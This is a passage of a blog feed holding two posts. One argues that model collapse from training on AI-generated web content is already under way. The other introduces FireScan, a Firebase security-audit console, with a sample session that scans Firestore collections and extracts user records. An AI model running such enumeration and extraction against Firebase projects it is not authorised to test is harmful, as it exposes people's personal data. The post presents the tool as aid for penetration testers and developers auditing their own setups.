<p>Yet AI companies still scrape the web for training data. They can't reliably distinguish human content from synthetic content. Which means <strong>the next generation of models will inevitably train on the outputs of previous models</strong>.</p>
<p>This is model collapse. And it's not theoretical - it's measurable, reproducible, and already happening.</p>
<h1 id="heading-how-model-collapse-works">How Model Collapse Works</h1>
<p>The feedback loop is straightforward:</p>
<ul>
<li><p><strong>Gen 1</strong>: Train on 95% human data, 5% AI slop → minor quality issues</p>
</li>
<li><p><strong>Gen 2</strong>: Train on 80% human data, 20% AI content → noticeable degradation</p>
</li>
<li><p><strong>Gen 3</strong>: Train on 60% human data, 40% AI outputs → significant problems</p>
</li>
<li><p><strong>Gen 4</strong>: Train on majority AI-generated content → model collapse</p>
</li>
</ul>
<p>Each generation compounds the problems:</p>
<ul>
<li><p><strong>Loss of diversity</strong> - outputs converge toward homogeneous, repetitive patterns</p>
</li>
<li><p><strong>Amplified biases</strong> - quirks from previous models get magnified</p>
</li>
<li><p><strong>Increased hallucinations</strong> - errors stack across generations</p>
</li>
<li><p><strong>Tail knowledge disappears</strong> - rare but critical information gets filtered out first</p>
</li>
</ul>
<p>It's the same principle as photocopying a photocopy. Each iteration degrades the original.</p>
<h1 id="heading-why-you-should-care">Why You Should Care</h1>
<p><strong>Code quality degradation</strong></p>
<p>If Copilot trains on AI-generated code that was itself generated by an earlier model, code suggestions degrade. You're not getting patterns from experienced developers anymore - you're getting averaged-out slop that "looks" like code.</p>
<p><strong>Security implications</strong></p>
<p>AI-assisted security tools trained on AI-generated vulnerability analyses will miss things. If the training data is full of hallucinated CVE details or incorrect exploit explanations, the model learns wrong information.</p>
<p><strong>Knowledge erosion</strong></p>
<p>Niche technical knowledge - the kind buried in obscure forum posts, old mailing lists, and forgotten documentation - disappears first. AI models optimise for common patterns. Rare but critical knowledge gets filtered out.</p>
<p><strong>Trust degradation</strong></p>
<p>You can't tell anymore if that blog post explaining a security vulnerability was written by someone who actually found and tested it, or by an LLM that pieced together fragments from six different sources and hallucinated the rest.</p>
<h1 id="heading-proposed-solutions-and-why-theyre-all-flawed">Proposed Solutions (And Why They're All Flawed)</h1>
<p><strong>Watermarking</strong></p>
<p>Embed cryptographic signatures in AI outputs to filter them during training. Google and OpenAI are researching this. Problem: watermarks can be stripped. It's an arms race.</p>
<p><strong>Provenance tracking</strong></p>
<p>Track the origin of all training data. Only use verified human content. Problem: doesn't scale. The entire value proposition of LLMs is training on massive web-scale datasets.</p>
<p><strong>Curated datasets</strong></p>
<p>Stop scraping the web entirely. Build human-verified, high-quality datasets. Problem: expensive, slow, and fundamentally limits what the model can learn.</p>
<p><strong>Adversarial filtering</strong></p>
<p>Train models to detect and exclude AI-generated text. Problem: classic adversarial arms race. Detection improves, generation improves to evade detection, repeat forever.</p>
<p><strong>Controlled synthetic mixing</strong></p>
<p>Carefully balance the ratio of real to synthetic data. Problem: requires knowing the exact contamination threshold, which varies by domain and model architecture.</p>
<p>None of these solve the core issue. And we might already be past the point of no return. The web is saturated with AI slop. Even if filtering started today, there are years of contamination already baked into datasets.</p>
<h1 id="heading-the-actual-problem">The Actual Problem</h1>
<p>We're running a one-way experiment on the future of LLMs, and nobody knows the safe parameters.</p>
<p>No one knows what percentage of AI contamination causes collapse. No one knows if current models are already degraded. No one knows how to reverse contamination once it's in the dataset.</p>
<p>LLMs were built on the assumption of abundant, renewable human knowledge. But that assumption was wrong. We're strip-mining the web for training data, and the mine doesn't refill. Every piece of human writing that gets replaced with AI slop permanently degrades the training pool.</p>
<h1 id="heading-the-economic-incentive-problem">The Economic Incentive Problem</h1>
<p>The economics make this worse. AI companies have no incentive to solve this:</p>
<ul>
<li><p>Scraping is free (legally questionable, but free)</p>
</li>
<li><p>Filtering costs money</p>
</li>
<li><p>Competition doesn't care about data quality 5 years from now</p>
</li>
<li><p>Investors reward shipping features, not long-term dataset integrity</p>
</li>
</ul>
<p>Publishers can't win either. Paywalling content to prevent scraping also blocks legitimate human readers. Not paywalling means getting drained by RAG systems that plagiarise without attribution.</p>
<p>Content creators lose traffic and revenue to AI summaries. So they either stop producing content (reducing the pool of human knowledge) or start using AI to produce more content faster (contaminating the pool).</p>
<p>It's a race to the bottom, and every participant is incentivised to make it worse.</p>
<h1 id="heading-what-actually-needs-to-happen">What Actually Needs to Happen</h1>
<p>The realistic options are limited:</p>
<ol>
<li><p><strong>Legislation requiring training data transparency</strong> - companies must disclose what they trained on and prove licensing rights</p>
</li>
<li><p><strong>Mandatory AI content labeling</strong> - cryptographic signatures that can't be easily stripped</p>
</li>
<li><p><strong>Royalty systems for scraped content</strong> - similar to how music licensing works</p>
</li>
<li><p><strong>Incentivise human-generated content</strong> - platforms that verify and reward genuine human writing</p>
</li>
</ol>
<p>None of this will happen voluntarily. The industry is too profitable and moving too fast. Regulation would need to come first, and regulators barely understand the technology.</p>
<p>More likely: we hit model collapse in 3-5 years, everyone scrambles to fix it retroactively, and we end up with some half-botched solution that only partially works.</p>
<h1 id="heading-final-thoughts">Final Thoughts</h1>
<p>Model collapse is not a hypothetical future problem. It's happening now, measurably, in controlled experiments. The only question is whether we're already seeing it in production models.</p>
<p>The feedback loop is real. The economic incentives ensure it will continue. And the proposed solutions all have fundamental flaws that make them unlikely to work at scale.</p>
<p>I'm not saying LLMs are doomed. I'm saying the current trajectory is unsustainable, and nobody with the power to fix it has an incentive to do so. The companies building these models are optimising for next quarter's revenue, not training data quality in 2030.</p>
<p>This will either get fixed through heavy-handed regulation, or we'll collectively find out what happens when AI models train on increasingly degraded synthetic data. My money is on the latter.</p>
<p>The snake is already eating its tail. We're just waiting to see how far down it gets before someone notices.</p>
<hr />
<p><strong>Research</strong>:</p>
<ul>
<li><p><a target="_blank" href="https://openreview.net/forum?id=5B2K4LRgmz">Is Model Collapse Inevitable? (Matthias Gerstgrasser et al., 2024)</a></p>
</li>
<li><p>The Curse of Recursion (<a target="_blank" href="https://arxiv.org/abs/2305.17493">Ilia Shumailov</a> <a target="_blank" href="https://arxiv.org/abs/2305.17493">et al., 2024)</a></p>
</li>
<li><p>AI models collapse when trained on recursively generated data (<a target="_blank" href="https://www.nature.com/articles/s41586-024-07566-y">Ilia Shumailov</a> <a target="_blank" href="https://www.nature.com/articles/s41586-024-07566-y">et al., 2024)</a></p>
</li>
<li><p><a target="_blank" href="https://www.cs.ox.ac.uk/news/2356-full.html">New research warns of potential ‘collapse’ of machine learning models</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Firebase Security Is Broken. Here's the Tool I Built to Fix It.]]></title><description><![CDATA[A couple of months ago I was doing a few penetration tests recently when I encountered Firebase configurations. Each time, I found myself stringing together a bunch of cURL commands and one-off Python scripts to check for common misconfigurations. Af...]]></description><link>https://blog.jacobalcock.co.uk/firebase-security-is-broken</link><guid isPermaLink="true">https://blog.jacobalcock.co.uk/firebase-security-is-broken</guid><category><![CDATA[Security]]></category><category><![CDATA[Firebase]]></category><category><![CDATA[cybersecurity]]></category><category><![CDATA[pentesting]]></category><category><![CDATA[penetration testing]]></category><category><![CDATA[Developer]]></category><dc:creator><![CDATA[Jacob Alcock]]></dc:creator><pubDate>Fri, 07 Nov 2025 09:00:23 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1762472084547/c405e4a2-3897-4084-b4e2-37aaa818245e.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>A couple of months ago I was doing a few penetration tests recently when I encountered Firebase configurations. Each time, I found myself stringing together a bunch of cURL commands and one-off Python scripts to check for common misconfigurations. After the third engagement, I realised this was pretty inefficient.</p>
<p>I was looking for a tool where I could just set the configuration and run enumeration checks. Something like <code>msfconsole</code> but for Firebase. I couldn't find anything that fit the bill, so <strong>I built it myself.</strong></p>
<h1 id="heading-the-problem">The Problem</h1>
<p>Firebase is incredibly popular - it powers millions of apps. But its security model is... tricky. The core issue is that Firebase uses declarative security rules. A single <code>||</code> operator in the wrong place can expose your entire database.</p>
<p>During pentests, I kept seeing the same patterns:</p>
<ul>
<li><p>RTDB nodes readable without authentication</p>
</li>
<li><p>Firestore collections with open read rules</p>
</li>
<li><p>Cloud Storage buckets listing all files</p>
</li>
<li><p>Cloud Functions without proper auth checks</p>
</li>
</ul>
<p>The <a target="_blank" href="https://www.youtube.com/watch?v=npfUPhu2aZg&amp;t=184s">Tea app breach</a> is a perfect example - misconfigured Firestore rules exposed sensitive user data. This wasn't a sophisticated attack, it was just someone checking if default or weak rules were still in place.</p>
<h1 id="heading-what-i-wanted">What I Wanted</h1>
<p>Coming from a pentesting background, I needed something that:</p>
<ol>
<li><p><strong>Works with minimal information</strong> (i.e. Just the projectID and web API key)</p>
</li>
<li><p><strong>Tests comprehensively</strong></p>
</li>
<li><p><strong>Is safe by default</strong> (Won't accidentally damage production data)</p>
</li>
<li><p><strong>Handles authentication properly</strong></p>
</li>
<li><p><strong>Scales to large wordlists</strong></p>
</li>
</ol>
<p>None of the existing tools checked all these boxes.</p>
<h1 id="heading-introducing-firescan">Introducing FireScan</h1>
<p>FireScan is a tool designed for penetration testers and developers to audit the security posture of Firebase projects. It provides an interactive console to enumerate databases, test storage rules, check function security, and much more, all from a single, easy-to-use interface.</p>
<pre><code class="lang-bash">$ firescan
███████╗██╗██████╗ ███████╗███████╗ ██████╗ █████╗ ███╗   ██╗
██╔════╝██║██╔══██╗██╔════╝██╔════╝██╔════╝██╔══██╗████╗  ██║
█████╗  ██║██████╔╝█████╗  ███████╗██║     ███████║██╔██╗ ██║
██╔══╝  ██║██╔══██╗██╔══╝  ╚════██║██║     ██╔══██║██║╚██╗██║
██║     ██║██║  ██║███████╗███████║╚██████╗██║  ██║██║ ╚████║
╚═╝     ╚═╝╚═╝  ╚═╝╚══════╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═══╝

FireScan v1.0 - The Firebase Security Auditor

firescan &gt; <span class="hljs-built_in">set</span> projectID my-app-12345
firescan &gt; <span class="hljs-built_in">set</span> apiKey AIza...
firescan &gt; auth --create-account
✓ Successfully authenticated
firescan &gt; scan --all
Key Features
</code></pre>
<h1 id="heading-example">Example</h1>
<p>Here's a real scenario from a recent test without the real data:</p>
<pre><code class="lang-bash">firescan &gt; <span class="hljs-built_in">set</span> projectID example-app-abc123 
firescan &gt; <span class="hljs-built_in">set</span> apiKey AIzaSy... 
firescan &gt; auth --create-account
firescan &gt; scan --firestore -l all
[✓] Scanning... [Checked: 200/200 | Found: 4]

[Firestore] Vulnerability Found! ├── Timestamp: 2025-01-15T10:23:45Z ├── Severity: High ├── Type: Firestore └── Path: users

[Firestore] Vulnerability Found! ├── Timestamp: 2025-01-15T10:23:47Z ├── Severity: High ├── Type: Firestore └── Path: messages

firescan &gt; extract --firestore --path users 
{ <span class="hljs-string">"documents"</span>: 
    [ { <span class="hljs-string">"DOCUMENT_ID"</span>: <span class="hljs-string">"user_12345"</span>, <span class="hljs-string">"email"</span>: <span class="hljs-string">"john.doe@example.com"</span>, <span class="hljs-string">"name"</span>: <span class="hljs-string">"John Doe"</span>, ... } ] 
}
</code></pre>
<p>In under 2 minutes, I found two readable collections and extracted the data. Without FireScan, this would have taken me 20 minutes of manual curl commands.</p>
<h1 id="heading-try-it-out"><strong>Try It Out</strong></h1>
<p><a target="_blank" href="https://github.com/JacobDavidAlcock/firescan"><strong>https://github.com/JacobDavidAlcock/firescan</strong></a></p>
]]></content:encoded></item></channel></rss>